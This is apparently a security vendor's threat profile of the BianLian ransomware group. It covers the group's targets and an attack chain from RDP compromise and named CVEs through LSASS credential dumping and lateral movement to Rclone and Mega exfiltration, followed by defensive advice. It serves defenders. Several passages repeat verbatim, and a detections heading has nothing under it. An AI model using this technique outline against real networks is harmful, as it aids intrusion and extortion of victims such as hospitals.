BianLian is a ransomware group known for targeting critical infrastructure sectors through sophisticated data exfiltration and extortion techniques, initially employing a double-extortion model before shifting to pure data extortion.
BianLian is a ransomware and data extortion group likely operating out of Russia, with multiple affiliates based in the same region. The group has been active since June 2022 and initially used a double-extortion model, combining data theft with file encryption. However, as of January 2024, BianLian has fully shifted to an exfiltration-only extortion model. They now focus exclusively on stealing data and demanding payment to prevent public disclosure, no longer encrypting victims' systems. Their name, likely chosen to misattribute location, reflects their attempt to complicate attribution efforts.
The majority of BianLian's attacks are concentrated in the United States, which accounts for 57.8% of the attacks. Other significant targets include the United Kingdom (10.2%), Canada (6.8%), and India (4.8%). Additionally, countries like Australia, Sweden, Germany, and Austria have also been affected, albeit to a lesser extent. This distribution underscores the group's focus on developed nations with robust digital infrastructures and significant amounts of valuable data.
Source: Ransomware.live
BianLian has shown a marked preference for certain industries, with the healthcare sector experiencing the highest number of attacks, followed by manufacturing, professional and legal services, high technology, and construction. Other notable targets include transportation and logistics, wholesale and retail, financial services, and education. This pattern highlights BianLian's focus on sectors that handle sensitive and critical data, making them prime targets for extortion and disruption.
Source: Palo Alto's Unit 42
BianLian has shown a marked preference for certain industries, with the healthcare sector experiencing the highest number of attacks, followed by manufacturing, professional and legal services, high technology, and construction. Other notable targets include transportation and logistics, wholesale and retail, financial services, and education. This pattern highlights BianLian's focus on sectors that handle sensitive and critical data, making them prime targets for extortion and disruption.
Source: Palo Alto's Unit 42
BianLian targeted more than 508 victims including medium to large enterprises in the financial, healthcare, and property development sectors. The group's methodology of leveraging compromised RDP credentials and exfiltrating sensitive data has led to significant financial and reputational damage for the affected organizations.
Source: Ransomware.live
BianLian gains access to networks through compromised Remote Desktop Protocol (RDP) credentials, obtained via phishing or from initial access brokers. They also exploit vulnerabilities in public-facing applications such as ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
They exploit vulnerabilities like CVE-2022-37969 to escalate privileges on Windows systems.
The group disables antivirus tools, including Windows Defender and Sophos tamper protection, using PowerShell and registry modifications. They also employ UPX packing to obfuscate their malware.
BianLian actors steal credentials by dumping Local Security Authority Subsystem Service (LSASS) memory and searching for plaintext credentials stored in files.
Using tools like Advanced Port Scanner and SharpShares, they enumerate network services, shared folders, and domain accounts to map the target’s environment.
They use RDP, PsExec, and Server Message Block (SMB) connections for lateral movement within networks.
Sensitive data is identified, compressed, and encrypted before being staged for exfiltration.
Data is stolen using FTP, Rclone, or Mega. Unlike in their earlier operations, they no longer encrypt endpoint data.
BianLian’s operations culminate in extortion, where they threaten to publicly leak stolen data, leveraging the victim’s fear of reputational, financial, and legal consequences to demand ransom payments.
BianLian gains access to networks through compromised Remote Desktop Protocol (RDP) credentials, obtained via phishing or from initial access brokers. They also exploit vulnerabilities in public-facing applications such as ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
They exploit vulnerabilities like CVE-2022-37969 to escalate privileges on Windows systems.
The group disables antivirus tools, including Windows Defender and Sophos tamper protection, using PowerShell and registry modifications. They also employ UPX packing to obfuscate their malware.
BianLian actors steal credentials by dumping Local Security Authority Subsystem Service (LSASS) memory and searching for plaintext credentials stored in files.
Using tools like Advanced Port Scanner and SharpShares, they enumerate network services, shared folders, and domain accounts to map the target’s environment.
They use RDP, PsExec, and Server Message Block (SMB) connections for lateral movement within networks.
Sensitive data is identified, compressed, and encrypted before being staged for exfiltration.
Data is stolen using FTP, Rclone, or Mega. Unlike in their earlier operations, they no longer encrypt endpoint data.
BianLian’s operations culminate in extortion, where they threaten to publicly leak stolen data, leveraging the victim’s fear of reputational, financial, and legal consequences to demand ransom payments.
BianLian employs various TTPs aligned with the MITRE ATT&CK framework. Some of the key TTPs include:
List of the Detections available in the Vectra AI Platform that would indicate a ransomware attack:
BianLian primarily gains initial access through compromised RDP credentials, often obtained via phishing or from initial access brokers.
They disable antivirus tools and tamper protection features using PowerShell and modify the Windows Registry to avoid detection.
BianLian targets critical infrastructure sectors in the U.S. and private enterprises in Australia, including sectors like healthcare, financial services, and property development.
BianLian exfiltrates data using FTP, Rclone, or Mega, uploading sensitive files to cloud storage services.
In 2023, BianLian shifted from encrypting victims' systems to focusing on exfiltration-based extortion, threatening to release stolen data unless paid.
They use tools like Advanced Port Scanner, SoftPerfect Network Scanner, and PingCastle to identify valuable targets within a network.
BianLian activates local administrator accounts and changes passwords to elevate privileges, facilitating further exploitation.
BianLian uses PsExec and RDP with valid credentials for lateral movement across the network.
Implement strict controls on remote access tools, disable unnecessary services, enforce strong password policies, and ensure regular software updates and patches.
XDR solutions can help by providing comprehensive visibility and automated response capabilities, detecting and mitigating suspicious activities across endpoints, networks, and cloud environments.